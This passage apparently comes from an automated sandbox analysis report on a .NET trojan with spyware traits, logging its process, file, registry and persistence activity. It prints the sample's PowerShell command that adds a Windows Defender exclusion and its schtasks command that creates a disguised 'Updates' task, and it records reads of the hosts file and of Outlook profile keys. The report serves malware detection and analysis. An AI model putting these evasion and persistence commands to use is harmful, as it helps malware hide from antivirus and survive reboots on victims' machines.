                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.347535078.00000000037C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIVectorView.dllN vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.350476892.0000000005840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCerbera.dll" vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTHWQcdcVCNvnIeHOYeXsEFJEQgIJHy.exe4 vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTHWQcdcVCNvnIeHOYeXsEFJEQgIJHy.exe4 vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000000.253700124.00000000001F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePARAMD.exe" vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTHWQcdcVCNvnIeHOYeXsEFJEQgIJHy.exe4 vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.326318211.0000000000A42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePARAMD.exe" vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.525745819.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeBinary or memory string: OriginalFilenamePARAMD.exe" vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: HksvOcmoc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeJump to behavior
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmpJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile created: C:\Users\user\AppData\Roaming\HksvOcmoc.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile created: C:\Users\user\AppData\Local\Temp\tmpCB43.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@1/1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, tI/Tn.csCryptographic APIs: 'CreateDecryptor'
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, tI/Tn.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.a40000.5.unpack, tI/Tn.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.a40000.5.unpack, tI/Tn.csCryptographic APIs: 'CreateDecryptor'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: PARAMD.pdb source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, HksvOcmoc.exe.0.dr
                Source: Binary string: PARAMD.pdb8 source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, HksvOcmoc.exe.0.dr

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, tI/Tn.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.a40000.5.unpack, tI/Tn.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 0_2_0588317C push cs; iretd 0_2_0588317D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeCode function: 15_2_02DB6896 push FFFFFF8Bh; iretd 15_2_02DB689B
                Source: initial sampleStatic PE information: section name: .text entropy: 7.75075398615
                Source: initial sampleStatic PE information: section name: .text entropy: 7.75075398615
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile created: C:\Users\user\AppData\Roaming\HksvOcmoc.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
